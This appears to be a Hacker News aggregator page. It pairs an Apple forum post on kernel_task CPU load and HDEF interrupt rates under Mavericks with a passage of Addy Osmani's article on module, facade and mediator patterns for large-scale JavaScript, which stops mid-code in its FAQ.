Channel: Hacker News 50

kernel_task is using 100% CPU when...: Apple Support Communities


Comments:"kernel_task is using 100% CPU when...: Apple Support Communities"

URL:https://discussions.apple.com/thread/5497235?start=0&tstart=0


I'm in the same boat. No issues before installing Mavericks.

 

I did the same tests, even disabled the 3rd party kext I had (pace driver, related to some vst plugins I have) with no luck.

 

I ran sysdiagnostics and can see the following interrupts, taken from powermetrics.txt:

 

****  Interrupt distribution ****

 

 

CPU 0:

          Vector 0x49(MacBookAir6,2): 31.67 interrupts/sec

          Vector 0x92(IGPU): 408.07 interrupts/sec

          Vector 0x96(HDEF): 216491.54 interrupts/sec

          Vector 0x98(ARPT): 11.06 interrupts/sec

          Vector 0x9e(SSD0): 25.10 interrupts/sec

          Vector 0xdd(TMR): 367.54 interrupts/sec

          Vector 0xde(IPI): 161.86 interrupts/sec

CPU 1:

          Vector 0xdd(TMR): 32.17 interrupts/sec

          Vector 0xde(IPI): 56.18 interrupts/sec

CPU 2:

          Vector 0xdd(TMR): 934.68 interrupts/sec

          Vector 0xde(IPI): 1103.50 interrupts/sec

CPU 3:

          Vector 0xdd(TMR): 165.04 interrupts/sec

          Vector 0xde(IPI): 242.83 interrupts/sec

 

 

I feel like that is not normal (see the HDEF interrupt rate above). Does anyone know what HDEF is referring to? It might help track this down.



Patterns For Large-Scale JavaScript Application Architecture


Comments:"Patterns For Large-Scale JavaScript Application Architecture"

URL:http://addyosmani.com/largescalejavascript/



 

Today we're going to discuss an effective set of patterns for large-scale JavaScript application architecture. The material is based on my talk of the same name, last presented at LondonJS and inspired by previous work by Nicholas Zakas.

 

Who am I and why am I writing about this topic?

I'm currently a JavaScript and UI developer at AOL helping to plan and write the front-end architecture to our next generation of client-facing applications. As these applications are both complex and often require an architecture that is scalable and highly-reusable, it's one of my responsibilities to ensure the patterns used to implement such applications are as sustainable as possible.

I also consider myself something of a design pattern enthusiast (although there are far more knowledgeable experts on this topic than I). I've previously written the creative-commons book 'Essential JavaScript Design Patterns' and am in the middle of writing the more detailed follow up to this book at the moment.

 

Can you summarize this article in 140 characters?

In the event of you being short for time, here's the tweet-sized summary of this article:

Decouple app. architecture w/module,facade & mediator patterns. Mods publish msgs, mediator acts as pub/sub mgr & facade handles security

 

What exactly is a 'large' JavaScript application?

Before we begin, let us attempt to define what we mean when we refer to a JavaScript application as being significantly 'large'. This is a question I've found still challenges developers with many years of experience in the field and the answer to this can be quite subjective.

As an experiment, I asked a few intermediate developers to try providing their definition of it informally. One developer suggested 'a JavaScript application with over 100,000 LOC' whilst another suggested 'apps with over 1MB of JavaScript code written in-house'. Whilst valiant (if not scary) suggestions, both of these are incorrect as the size of a codebase does not always correlate to application complexity - those 100,000 LOC could easily represent quite trivial code.

My own definition may or may not be universally accepted, but I believe that it's closer to what a large application actually represents.

In my view, large-scale JavaScript apps are non-trivial applications requiring significant developer effort to maintain, where most heavy lifting of data manipulation and display falls to the browser.

The last part of this definition is possibly the most significant.

Let's review your current architecture.

If working on a significantly large JavaScript application, remember to dedicate sufficient time to planning the underlying architecture that makes the most sense. It's often more complex than you may initially imagine.

I can't stress the importance of this enough - some developers I've seen approach larger applications have stepped back and said 'Okay. Well, there are a set of ideas and patterns that worked well for me on my last medium-scale project. Surely they should mostly apply to something a little larger, right?'. Whilst this may be true to an extent, please don't take it for granted - larger apps generally have greater concerns that need to be factored in. I'm going to discuss shortly why spending a little more time planning out the structure to your application is worth it in the long run.

Most JavaScript developers likely use a mixed combination of the following for their current architecture:

  • custom widgets
  • models
  • views
  • controllers
  • templates
  • libraries/toolkits
  • an application core.

You probably also break down your application's functionality into blocks of modules or apply other patterns for this. This is great, but there are a number of potential problems you can run into if this represents all of your application's structure.

1. How much of this architecture is instantly re-usable?

Can single modules exist on their own independently? Are they self-contained? Right now if I were to look at the codebase for a large application you or your team were working on and selected a random module, would it be possible for me to easily just drop it into a new page and start using it on its own? You may question the rationale behind wanting to do this, however I encourage you to think about the future. What if your company were to begin building more and more non-trivial applications which shared some cross-over in functionality? If someone said, 'Our users love using the chat module in our mail client. Let's drop that into our new collaborative editing suite', would this be possible without significantly altering the code?

2. How much do modules depend on other modules in the system?

Are they tightly coupled? Before I dig into why this is a concern, I should note that I understand it's not always possible to have modules with absolutely no other dependencies in a system. At a granular level you may well have modules that extend the base functionality of others, but this question is more-so related to groups of modules with distinct functionality. It should be possible for all of these distinct sets of modules to work in your application without depending on too many other modules being present or loaded in order to function.

3. If specific parts of your application fail, can it still function?

If you're building a GMail-like application and your webmail module (or modules) fail, this shouldn't block the rest of the UI or prevent users from being able to use other parts of the page such as chat. At the same time, as per before, modules should ideally be able to exist on their own outside of your current application architecture. In my talks I mention dynamic dependency (or module) loading based on expressed user-intent as something related. For example, in GMail's case they might have the chat module collapsed by default without the core module code loaded on page initialization. If a user expressed an intent to use the chat feature, only then would it be dynamically loaded. Ideally, you want this to be possible without it negatively affecting the rest of your application.
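To illustrate the dynamic loading idea, here is a minimal sketch assuming an AMD-style loader such as RequireJS is present on the page, and that a 'chat' module id and a 'chat-toggle' element exist (both names are hypothetical):

// Hypothetical: fetch and start the chat module only when the user shows intent
document.getElementById('chat-toggle').onclick = function () {
    require(['chat'], function (chat) {
        // the module is loaded asynchronously, then started on demand
        chat.init();
    });
};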

4. How easily can you test individual modules?

When working on systems of significant scale where there's a potential for millions of users to use (or mis-use) the different parts of it, it's essential that modules which may end up being re-used across a number of different applications be sufficiently tested. Testing needs to be possible both when the module is inside and outside of the architecture for which it was initially built. In my view, this provides the most assurance that it shouldn't break if dropped into another system.

Think Long Term

When devising the architecture for your large application, it's important to think ahead. Not just a month or a year from now, but beyond that. What might change? It's of course impossible to guess exactly how your application may grow, but there's certainly room to consider what is likely. Here, there is at least one specific aspect of your application that comes to mind.

Developers often couple their DOM manipulation code quite tightly with the rest of their application - even when they've gone to the trouble of separating their core logic down into modules. Think about it: why is this not a good idea if we're thinking long-term?

One member of my audience suggested that it was because a rigid architecture defined in the present may not be suitable for the future. Whilst certainly true, there's another concern that may cost even more if not factored in.

You may well decide to switch from using Dojo, jQuery, Zepto or YUI to something entirely different for reasons of performance, security or design in the future. This can become a problem because libraries are not easily interchangeable and have high switching costs if tightly coupled to your app.

If you're a Dojo developer (like some of the audience at my talk), you may not have something better to switch to in the present, but who is to say that in 2-3 years something better doesn't come out that you'll want to switch to?

This is a relatively trivial decision in smaller codebases but for larger applications, having an architecture which is flexible enough to support not caring about the libraries being used in your modules can be of great benefit, both financially and from a time-saving perspective.

To summarize, if you reviewed your architecture right now, could a decision to switch libraries be made without rewriting your entire application? If not, consider reading on because I think the architecture being outlined today may be of interest.

There are a number of influential JavaScript developers who have previously outlined some of the concerns I've touched upon so far. Three key quotes I would like to share from them are the following:

"The secret to building large apps is never build large apps. Break your applications into small pieces. Then, assemble those testable, bite-sized pieces into your big application" - Justin Meyer, author JavaScriptMVC

"The key is to acknowledge from the start that you have no idea how this will grow. When you accept that you don't know everything, you begin to design the system defensively. You identify the key areas that may change, which often is very easy when you put a little bit of time into it. For instance, you should expect that any part of the app that communicates with another system will likely change, so you need to abstract that away." - Nicholas Zakas, author 'High-performance JavaScript websites'

and last but not least:

"The more tied components are to each other, the less reusable they will be, and the more difficult it becomes to make changes to one without accidentally affecting another" - Rebecca Murphey, author of jQuery Fundamentals.

These principles are essential to building an architecture that can stand the test of time and should always be kept in mind.

Brainstorming

Let's think about what we're trying to achieve for a moment.

We want a loosely coupled architecture with functionality broken down into independent modules with ideally no inter-module dependencies. Modules speak to the rest of the application when something interesting happens and an intermediate layer interprets and reacts to these messages.

For example, if we had a JavaScript application responsible for an online bakery, one such 'interesting' message from a module might be 'batch 42 of bread rolls is ready for dispatch'.

We use a different layer to interpret messages from modules so that a) modules don't directly access the core and b) modules don't need to directly call or interact with other modules. This helps prevent applications from falling over due to errors with specific modules and provides us a way to kick-start modules which have fallen over.
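As a very small, self-contained sketch of this idea (the names below are purely illustrative; a fuller mediator implementation appears later in this article), the bakery module only announces the event and the intermediate layer decides how to react:

// A single message channel standing in for the intermediate layer
var channel = {
    handlers: [],
    subscribe: function (fn) { this.handlers.push(fn); },
    publish: function (msg) {
        this.handlers.forEach(function (fn) { fn(msg); });
    }
};

// The intermediate layer interprets messages from modules
channel.subscribe(function (msg) {
    console.log('Core received: ' + msg);
});

// The bakery module knows nothing about who (if anyone) is listening
var bakeryModule = {
    batchReady: function (id) {
        channel.publish('batch ' + id + ' of bread rolls is ready for dispatch');
    }
};

bakeryModule.batchReady(42); // Core received: batch 42 of bread rolls is ready for dispatch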

Another concern is security. The reality is that most of us don't consider internal application security as that much of a concern. We tell ourselves that as we're structuring the application, we're intelligent enough to figure out what should be publicly or privately accessible.

However, wouldn't it help if you had a way to determine what a module was permitted to do in the system? eg. if I know I've limited the permissions in my system to not allow a public chat widget to interface with an admin module or a module with DB-write permissions, I can limit the chances of someone exploiting vulnerabilities I have yet to find in the widget to pass some XSS in there. Modules shouldn’t be able to access everything. They probably can in most current architectures, but do they really need to be able to?

Having an intermediate layer handle permissions for which modules can access which parts of your framework gives you added security. This means a module is only able to do at most what we’ve permitted it to do.

The Proposed Architecture

 

The architecture being proposed is a combination of three well-known design patterns: the module, facade and mediator.

Rather than the traditional model of modules directly communicating with each other, in this decoupled architecture, they'll instead only publish events of interest (ideally, without a knowledge of other modules in the system). The mediator pattern will be used to both subscribe to messages from these modules and handle what the appropriate response to notifications should be. The facade pattern will be used to enforce module permissions.

I will be going into more detail on each of these patterns below:

Module Theory

You probably already use some variation of modules in your existing architecture. If however, you don't, this section will present a short primer on them.

Modules are an integral piece of any robust application's architecture and are typically single-purpose parts of a larger system that are interchangeable.

Depending on how you implement modules, it's possible to define dependencies for them which can be automatically loaded to bring together all of the other parts instantly. This is considered more scalable than having to track the various dependencies for them and manually load modules or inject script tags.

Any significantly non-trivial application should be built from modular components. Going back to GMail, you could consider modules independent units of functionality that can exist on their own, so the chat feature for example. It's probably backed by a chat module, however, depending on how complex that unit of functionality is, it may well have more granular sub-modules that it depends on. For example, one could have a module simply to handle the use of emoticons which can be shared across both chat and mail composition parts of the system.

In the architecture being discussed, modules have a very limited knowledge of what's going on in the rest of the system. Instead, we delegate this responsibility to a mediator via a facade.

This is by design because if a module only cares about letting the system know when something of interest happens without worrying if other modules are running, a system is capable of supporting adding, removing or replacing modules without the rest of the modules in the system falling over due to tight coupling.

Loose coupling is thus essential to this idea being possible. It facilitates easier maintainability of modules by removing code dependencies where possible. In our case, modules should not rely on other modules in order to function correctly. When loose coupling is implemented effectively, it's straightforward to see how changes to one part of a system may affect another.

In JavaScript, there are several options for implementing modules including the well-known module pattern and object literals. Experienced developers will already be familiar with these and if so, please skip ahead to the section on CommonJS modules.

The Module Pattern

The module pattern is a popular design pattern that encapsulates 'privacy', state and organization using closures. It provides a way of wrapping a mix of public and private methods and variables, protecting pieces from leaking into the global scope and accidentally colliding with another developer's interface. With this pattern, only a public API is returned, keeping everything else within the closure private.

This provides a clean solution for shielding logic doing the heavy lifting whilst only exposing an interface you wish other parts of your application to use. The pattern is quite similar to an immediately-invoked function expression (IIFE) except that an object is returned rather than a function.

It should be noted that there isn't really a true sense of 'privacy' inside JavaScript because unlike some traditional languages, it doesn't have access modifiers. Variables can't technically be declared as being public nor private and so we use function scope to simulate this concept. Within the module pattern, variables or methods declared are only available inside the module itself thanks to closure. Variables or methods defined within the returning object however are available to everyone.

Below you can see an example of a shopping basket implemented using the pattern. The module itself is completely self-contained in a global object called basketModule. The basket array in the module is kept private and so other parts of your application are unable to directly read it. It only exists within the module's closure and so the only methods able to access it are those with access to its scope (ie. addItem(), getItemCount() etc).

var basketModule = (function() {
    var basket = []; //private
    return { //exposed to public
        addItem: function(values) {
            basket.push(values);
        },
        getItemCount: function() {
            return basket.length;
        },
        getTotal: function() {
            var q = this.getItemCount(), p = 0;
            while (q--) {
                p += basket[q].price;
            }
            return p;
        }
    };
}());

Inside the module, you'll notice we return an object. This gets automatically assigned to basketModule so that you can interact with it as follows:

//basketModule is an object with properties which can also be methods
basketModule.addItem({item:'bread',price:0.5});
basketModule.addItem({item:'butter',price:0.3});
console.log(basketModule.getItemCount());
console.log(basketModule.getTotal());
//however, the following will not work:
console.log(basketModule.basket);// (undefined as not inside the returned object)
console.log(basket); //(only exists within the scope of the closure)

The methods above are effectively namespaced inside basketModule.

From a historical perspective, the module pattern was originally developed by a number of people including Richard Cornford in 2003. It was later popularized by Douglas Crockford in his lectures and re-introduced by Eric Miraglia on the YUI blog.

How about the module pattern in specific toolkits or frameworks?

Dojo

Dojo attempts to provide 'class'-like functionality through dojo.declare, which can be used for, amongst other things, creating implementations of the module pattern. For example, if we wanted to declare basket as a module of the store namespace, this could be achieved as follows:

//traditional way
var store = window.store || {};
store.basket = store.basket || {};
//using dojo.setObject
dojo.setObject("store.basket.object", (function() {
 var basket = [];
 function privateMethod() {
 console.log(basket);
 }
 return {
 publicMethod: function(){
 privateMethod();
 }
 };
}()));

which can become quite powerful when used with dojo.provide and mixins.

YUI

The following example is heavily based on the original YUI module pattern implementation by Eric Miraglia, but is relatively self-explanatory.

YAHOO.store.basket = function () {
    //"private" variables:
    var myPrivateVar = "I can be accessed only within YAHOO.store.basket.";
    //"private" method:
    var myPrivateMethod = function () {
        YAHOO.log("I can be accessed only from within YAHOO.store.basket");
    };
    return {
        myPublicProperty: "I'm a public property.",
        myPublicMethod: function () {
            YAHOO.log("I'm a public method.");
            //Within basket, I can access "private" vars and methods:
            YAHOO.log(myPrivateVar);
            YAHOO.log(myPrivateMethod());
            //The native scope of myPublicMethod is store so we can
            //access public members using "this":
            YAHOO.log(this.myPublicProperty);
        }
    };
}();

jQuery

There are a number of ways in which jQuery code unspecific to plugins can be wrapped inside the module pattern. Ben Cherry previously suggested an implementation where a function wrapper is used around module definitions in the event of there being a number of commonalities between modules.

In the following example, a library function is defined which declares a new library and automatically binds up the init function to document.ready when new libraries (ie. modules) are created.

function library(module) {
    $(function() {
        if (module.init) {
            module.init();
        }
    });
    return module;
}
var myLibrary = library(function() {
    return {
        init: function() {
            /*implementation*/
        }
    };
}());

Object Literal Notation

In object literal notation, an object is described as a set of comma-separated name/value pairs enclosed in curly braces ({}). Names inside the object may be either strings or identifiers that are followed by a colon. There should be no comma used after the final name/value pair in the object as this may result in errors.

Object literals don't require instantiation using the new operator but shouldn't be used at the start of a statement as the opening { may be interpreted as the beginning of a block. Below you can see an example of a module defined using object literal syntax. New members may be added to the object using assignment as follows: myModule.property = 'someValue';

Whilst the module pattern is useful for many things, if you find yourself not requiring specific properties or methods to be private, the object literal is a more than suitable alternative.

var myModule = {
    myProperty : 'someValue',
    //object literals can contain properties and methods.
    //here, another object is defined for configuration
    //purposes:
    myConfig:{
        useCaching:true,
        language: 'en'   
    },
    //a very basic method
    myMethod: function(){
        console.log('I can haz functionality?');
    },
    //output a value based on current configuration
    myMethod2: function(){
        console.log('Caching is: ' + (this.myConfig.useCaching ? 'enabled' : 'disabled'));
    },
    //override the current configuration
    myMethod3: function(newConfig){
        if(typeof newConfig == 'object'){
           this.myConfig = newConfig;
           console.log(this.myConfig.language); 
        }
    }
};
myModule.myMethod(); //I can haz functionality?
myModule.myMethod2(); //outputs Caching is: enabled
myModule.myMethod3({language:'fr',useCaching:false}); //fr

CommonJS Modules

Over the last year or two, you may have heard about CommonJS - a volunteer working group which designs, prototypes and standardizes JavaScript APIs. To date they've ratified standards for modules and packages. The CommonJS AMD proposal specifies a simple API for declaring modules which can be used with both synchronous and asynchronous script tag loading in the browser. Their module pattern is relatively clean and I consider it a reliable stepping stone to the module system proposed for ES Harmony (the next release of the JavaScript language).

From a structure perspective, a CommonJS module is a reusable piece of JavaScript which exports specific objects made available to any dependent code. This module format is becoming quite ubiquitous as a standard module format for JS. There are plenty of great tutorials on implementing CommonJS modules, but at a high-level they basically contain two primary parts: an exports object that contains the objects a module wishes to make available to other modules and a require function that modules can use to import the exports of other modules.
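As a minimal sketch of the format (the file names bakery.js and app.js are hypothetical, and this is the plain CommonJS form rather than any particular loader's variant), exports and require fit together like this:

// bakery.js - exposes one function on the exports object
exports.batchReady = function (id) {
    return 'batch ' + id + ' is ready for dispatch';
};

// app.js - a dependent module pulls in bakery's exports via require
var bakery = require('./bakery');
console.log(bakery.batchReady(42)); // batch 42 is ready for dispatch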

/*
Example of achieving compatibility with AMD and standard CommonJS by putting boilerplate around the standard CommonJS module format:
*/
(function(define){
    define(function(require, exports){
        // module contents
        var dep1 = require("dep1");
        exports.someExportedFunction = function(){ ... };
        //...
    });
})(typeof define == "function" ? define : function(factory){ factory(require, exports); });

There are a number of great JavaScript libraries for handling module loading in the CommonJS module format, but my personal preference is RequireJS. A complete tutorial on RequireJS is outside the scope of this article, but I can recommend reading James Burke's ScriptJunkie post on it. I know a number of people that also like Yabble.

Out of the box, RequireJS provides methods for easing how we create static modules with wrappers and it's extremely easy to craft modules with support for asynchronous loading. It can easily load modules and their dependencies this way and execute the body of the module once available.
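For instance, here is a small sketch using the dependency-array form of define (the 'cart' and 'inventory' module ids and their methods are hypothetical); the loader fetches the named dependencies asynchronously and only runs the factory once they are available:

// basket.js - an AMD module with an explicit dependency array
define(['cart', 'inventory'], function (cart, inventory) {
    // this factory only executes once 'cart' and 'inventory' have loaded
    return {
        addToBasket: function (item) {
            if (inventory.inStock(item)) {
                cart.add(item);
            }
        }
    };
});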

Some developers, however, claim that CommonJS modules aren't suitable for the browser. The reason cited is that they can't be loaded via a script tag without some level of server-side assistance. We can imagine having a library for encoding images as ASCII art which might export an encodeToASCII function. A module from this could resemble:

var encodeToASCII = require("encoder").encodeToASCII;
exports.encodeSomeSource = function(){
    //process then call encodeToASCII
};

This type of scenario wouldn't work with a script tag because the scope isn't wrapped, meaning our encodeToASCII method would be attached to the window, require wouldn't be defined and exports would need to be created for each module separately. A client-side library together with server-side assistance, or a library loading the script with an XHR request using eval(), could however handle this easily.

Using RequireJS, the module from earlier could be rewritten as follows:

define(function(require, exports, module) {
    var encodeToASCII = require("encoder").encodeToASCII;
    exports.encodeSomeSource = function(){
        //process then call encodeToASCII
    };
});

For developers who may not rely on just using static JavaScript for their projects, CommonJS modules are an excellent path to go down, but do spend some time reading up on them. I've really only covered the tip of the iceberg here, but both the CommonJS wiki and SitePen have a number of resources if you wish to read further.

The Facade Pattern

Next, we're going to look at the facade pattern, a design pattern which plays a critical role in the architecture being defined today.

When you put up a facade, you're usually creating an outward appearance which conceals a different reality. The facade pattern provides a convenient higher-level interface to a larger body of code, hiding its true underlying complexity. Think of it as simplifying the API being presented to other developers.

Facades are a structural pattern which can often be seen in JavaScript libraries and frameworks where, although an implementation may support methods with a wide range of behaviors, only a 'facade' or limited abstraction of these methods is presented to the client for use.

This allows us to interact with the facade rather than the subsystem behind the scenes.

The reason the facade is of interest is because of its ability to hide implementation-specific details about a body of functionality contained in individual modules. The implementation of a module can change without the clients really even knowing about it.

By maintaining a consistent facade (simplified API), the worry about whether a module extensively uses dojo, jQuery, YUI, zepto or something else becomes significantly less important. As long as the interaction layer doesn't change, you retain the ability to switch out libraries (eg. jQuery for Dojo) at a later point without affecting the rest of the system.

Below is a very basic example of a facade in action. As you can see, our module contains a number of methods which have been privately defined. A facade is then used to supply a much simpler API to accessing these methods:

var module = (function() {
    var _private = {
        i: 5,
        get: function() {
            console.log('current value:' + this.i);
        },
        set: function( val ) {
            this.i = val;
        },
        run: function() {
            console.log('running');
        },
        jump: function() {
            console.log('jumping');
        }
    };
    return {
        facade: function( args ) {
            _private.set(args.val);
            _private.get();
            if ( args.run ) {
                _private.run();
            }
        }
    };
}());
module.facade({run: true, val:10});
//outputs current value: 10, running

and that's really it for the facade before we apply it to our architecture. Next, we'll be diving into the exciting mediator pattern. The core difference between the facade pattern and the mediator is that the facade (a structural pattern) only exposes existing functionality whilst the mediator (a behavioral pattern) can add functionality.

 

The Mediator Pattern

The mediator pattern is best introduced with a simple analogy - think of your typical airport traffic control. The tower handles what planes can take off and land because all communications are done from the planes to the control tower, rather than from plane-to-plane. A centralized controller is key to the success of this system and that's really what a mediator is.

Mediators are used when the communication between modules may be complex, but is still well defined. If it appears a system may have too many relationships between modules in your code, it may be time to have a central point of control, which is where the pattern fits in.

In real-world terms, a mediator encapsulates how disparate modules interact with each other by acting as an intermediary. The pattern also promotes loose coupling by preventing objects from referring to each other explicitly - in our system, this helps to solve our module inter-dependency issues.

What other advantages does it have to offer? Well, mediators allow for actions of each module to vary independently, so it’s extremely flexible. If you've previously used the Observer (Pub/Sub) pattern to implement an event broadcast system between the modules in your system, you'll find mediators relatively easy to understand.

Let's take a look at a high level view of how modules might interact with a mediator:

Consider modules as publishers and the mediator as both a publisher and subscriber. Module 1 broadcasts an event notifying the mediator that something needs to be done. The mediator captures this message and 'starts' the modules needed to complete this task. Module 2 performs the task that Module 1 requires and broadcasts a completion event back to the mediator. In the meantime, Module 3 has also been started by the mediator and is logging results of any notifications passed back from the mediator.

Notice how at no point do any of the modules directly communicate with one another. If Module 3 in the chain were to simply fail or stop functioning, the mediator could hypothetically 'pause' the tasks on the other modules, stop and restart Module 3 and then continue working with little to no impact on the system. This level of decoupling is one of the main strengths the pattern has to offer.

To review, the advantages of the mediator are that:

  • It decouples modules by introducing an intermediary as a central point of control.
  • It allows modules to broadcast or listen for messages without being concerned with the rest of the system. Messages can be handled by any number of modules at once.
  • It is typically significantly easier to add or remove features to systems which are loosely coupled like this.

And its disadvantages:

By adding a mediator between modules, they must always communicate indirectly. This can cause a very minor performance drop. Also, because of the nature of loose coupling, it's difficult to establish how a system might react by only looking at the broadcasts. At the end of the day, tight coupling causes all kinds of headaches and this is just one solution.

Example: This is a possible implementation of the mediator pattern based on previous work by @rpflorence

var mediator = (function(){
    var subscribe = function(channel, fn){
        if (!mediator.channels[channel]) mediator.channels[channel] = [];
        mediator.channels[channel].push({ context: this, callback: fn });
        return this;
    },
    publish = function(channel){
        if (!mediator.channels[channel]) return false;
        var args = Array.prototype.slice.call(arguments, 1);
        for (var i = 0, l = mediator.channels[channel].length; i < l; i++){
            var sub = mediator.channels[channel][i];
            sub.callback.apply(sub.context, args);
        }
        return this;
    };
    return {
        channels: {},
        publish: publish,
        subscribe: subscribe,
        installTo: function(obj){ obj.subscribe = subscribe; obj.publish = publish; }
    };
}());

Example: Here are two sample uses of the implementation from above. It's effectively managed publish/subscribe:

//Pub/sub on a centralized mediator
mediator.name = "tim";
mediator.subscribe('nameChange', function(arg){
        console.log(this.name);
        this.name = arg;
        console.log(this.name);
});
mediator.publish('nameChange', 'david'); //tim, david
//Pub/sub via third party mediator
var obj = { name: 'sam' };
mediator.installTo(obj);
obj.subscribe('nameChange', function(arg){
        console.log(this.name);
        this.name = arg;
        console.log(this.name);
});
obj.publish('nameChange', 'john'); //sam, john

 

Applying The Facade: Abstraction Of The Core

In the architecture suggested:

A facade serves as an abstraction of the application core which sits between the mediator and our modules - it should ideally be the only other part of the system modules are aware of.

The responsibilities of the abstraction include ensuring a consistent interface to these modules is available at all times. This closely resembles the role of the sandbox controller in the excellent architecture first suggested by Nicholas Zakas.

Components are going to communicate with the mediator through the facade, so it needs to be dependable. When I say 'communicate', I should clarify that the facade is an abstraction of the mediator: it listens out for broadcasts from modules and relays them back to the mediator.

In addition to providing an interface to modules, the facade also acts as a security guard, determining which parts of the application a module may access. Components only call their own methods and shouldn't be able to interface with anything they don't have permission to. For example, a module may broadcast dataValidationCompletedWriteToDB. The idea of a security check here is to ensure that the module has permissions to request database-write access. What we ideally want to avoid are issues with modules accidentally trying to do something they shouldn't be.

To review in short, the mediator remains a type of pub/sub manager but is only passed interesting messages once they've cleared permission checks by the facade.
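A very rough sketch of that idea follows. The permissions table, module ids and channel names are invented for illustration, and the facade delegates to the mediator implementation shown earlier once a publisher has cleared the check:

var facade = (function (mediator) {
    // hypothetical permissions map: which channels each module may publish to
    var permissions = {
        chatWidget: ['messageUpdate'],
        dataModule: ['dataValidationCompletedWriteToDB']
    };
    return {
        publish: function (moduleId, channel, data) {
            var allowed = permissions[moduleId] || [];
            if (allowed.indexOf(channel) === -1) {
                console.log('Blocked: ' + moduleId + ' may not publish to ' + channel);
                return false;
            }
            // cleared the permission check - relay to the mediator (pub/sub manager)
            return mediator.publish(channel, data);
        },
        subscribe: function (channel, fn) {
            return mediator.subscribe(channel, fn);
        }
    };
}(mediator));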

 

Applying the Mediator: The Application Core

The mediator plays the role of the application core. We've briefly touched on some of its responsibilities, but let's clarify what they are in full.

The core's primary job is to manage the module lifecycle. When the core detects an interesting message it needs to decide how the application should react - this effectively means deciding whether a module or set of modules needs to be started or stopped.

Once a module has been started, it should ideally execute automatically. It's not the core's task to decide whether this should be when the DOM is ready and there's enough scope in the architecture for modules to make such decisions on their own.

You may be wondering in what circumstance a module might need to be 'stopped' - if the application detects that a particular module has failed or is experiencing significant errors, a decision can be made to prevent methods in that module from executing further so that it may be restarted. The goal here is to assist in reducing disruption to the user experience.

In addition, the core should enable adding or removing modules without breaking anything. A typical example of where this may be the case is functionality which may not be available on initial page load, but is dynamically loaded based on expressed user-intent eg. going back to our GMail example, Google could keep the chat widget collapsed by default and only dynamically load in the chat module(s) when a user expresses an interest in using that part of the application. From a performance optimization perspective, this may make sense.

Error management will also be handled by the application core. In addition to modules broadcasting messages of interest, they will also broadcast any errors experienced, which the core can then react to accordingly (eg. stopping modules, restarting them etc). It's important that, as part of a decoupled architecture, there is enough scope for the introduction of new or better ways of handling or displaying errors to the end user without manually having to change each module. Using publish/subscribe through a mediator allows us to achieve this.
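A bare-bones sketch of such a core is shown below. The register/start/stop/restart API is illustrative rather than prescriptive, and it assumes each module creator returns an object with init() and destroy() methods and receives the facade from the previous section as its only point of contact:

var core = (function () {
    var moduleData = {}; // registered creators and any running instances
    return {
        register: function (id, creator) {
            moduleData[id] = { creator: creator, instance: null };
        },
        start: function (id) {
            var data = moduleData[id];
            if (data && !data.instance) {
                data.instance = data.creator(facade); // hand the module its facade/sandbox
                data.instance.init();
            }
        },
        stop: function (id) {
            var data = moduleData[id];
            if (data && data.instance) {
                data.instance.destroy();
                data.instance = null;
            }
        },
        restart: function (id) {
            // eg. invoked after a module broadcasts errors and needs a clean slate
            this.stop(id);
            this.start(id);
        }
    };
}());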

 

Tying It All Together

 

  • Modules contain specific pieces of functionality for your application. They publish notifications informing the application whenever something interesting happens - this is their primary concern. As I'll cover in the FAQs, modules can depend on DOM utility methods, but ideally shouldn't depend on any other modules in the system. They should not be concerned with:

    • what objects or modules are subscribing to the messages they publish
    • where these objects are based (whether this is on the client or server)
    • how many objects subscribe to notifications

  • The Facade abstracts the core to avoid modules touching it directly. It subscribes to interesting events (from modules) and says 'Great! What happened? Give me the details!'. It also handles module security by checking to ensure the module broadcasting an event has the necessary permissions for events of that type to be accepted.

  • The Mediator (Application Core) acts as a 'Pub/Sub' manager using the mediator pattern. It's responsible for module management and starts/stops modules as needed. This is of particular use for dynamic dependency loading and ensuring modules which fail can be centrally restarted as needed.

The result of this architecture is that modules (in most cases) are theoretically no longer dependent on other modules. They can be easily tested and maintained on their own and because of the level of decoupling applied, modules can be picked up and dropped into a new page for use in another project without significant additional effort. They can also be dynamically added or removed without the application falling over.

 

Beyond Pub/Sub: Automatic Event Registration

As previously mentioned by Michael Mahemoff, when thinking about large-scale JavaScript, it can be of benefit to exploit some of the more dynamic features of the language. You can read more about some of the concerns highlighted on Michael's G+ page, but I would like to focus on one specifically - automatic event registration (AER).

AER solves the problem of wiring up subscribers to publishers by introducing a pattern which auto-wires based on naming conventions. For example, if a module publishes an event called messageUpdate, anything with a messageUpdate method would be automatically called.
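As a loose, self-contained sketch of that convention (this is not Michael's exact implementation; the registry and event names are invented for illustration), any registered component exposing a method whose name matches the published event is called automatically:

var registry = {
    components: [],
    register: function (component) {
        this.components.push(component);
    },
    // auto-wire by naming convention: publishing 'messageUpdate' calls every
    // registered component that happens to define a messageUpdate method
    publish: function (eventName) {
        var args = Array.prototype.slice.call(arguments, 1);
        this.components.forEach(function (component) {
            if (typeof component[eventName] === 'function') {
                component[eventName].apply(component, args);
            }
        });
    }
};

registry.register({
    messageUpdate: function (msg) { console.log('inbox saw: ' + msg); }
});
registry.publish('messageUpdate', 'hello'); // inbox saw: hello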

The setup for this pattern involves registering all components which might subscribe to events, registering all events that may be subscribed to and finally for each subscription method in your component-set, binding the event to it. It's a very interesting approach which is related to the architecture presented in this post, but does come with some interesting challenges.

For example, when working dynamically, objects may be required to register themselves upon creation. Please feel free to check out Michael's post on AER as he discusses how to handle such issues in more depth.

 

Frequently Asked Questions

Q: Is it possible to avoid implementing a sandbox or facade altogether?

A: Although the architecture outlined uses a facade to implement security features, it's entirely possible to get by using a mediator and pub/sub to communicate events of interest throughout the application without it. This lighter version would offer a similar level of decoupling, but ensure you're comfortable with modules directly touching the application core (mediator) if opting for this variation.

Q: You've mentioned modules not having any dependencies. Does this include dependencies such as third party libraries (eg. jQuery?)

A: I'm specifically referring to dependencies on other modules here. What some developers choosing an architecture like this opt for is abstracting utilities common to DOM libraries - eg. one could have a DOM utility class for query selectors which, when used, returns the result of querying the DOM using jQuery (or, if you switched it out at a later point, Dojo). This way, although modules still query the DOM, they aren't directly using hardcoded functions from any particular library or toolkit. There's quite a lot of variation in how this might be achieved, but the takeaway is that ideally core modules shouldn't depend on other modules if opting for this architecture.

You'll find that when this is the case it can sometimes be more easy to get a complete module from one project working in another with little extra effort. I should make it clear that I fully agree that it can sometimes be significantly more sensible for modules to extend or use other modules for part of their functionality, however bear in mind that this can in some cases increase the effort required to make such modules 'liftable' for other projects.
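To make the abstraction described above concrete, here is a rough sketch of such a DOM utility (the dom name and the jQuery/Dojo comments are illustrative; the point is simply that modules call dom.query rather than $ or dojo.query directly):

var dom = (function () {
    return {
        query: function (selector, context) {
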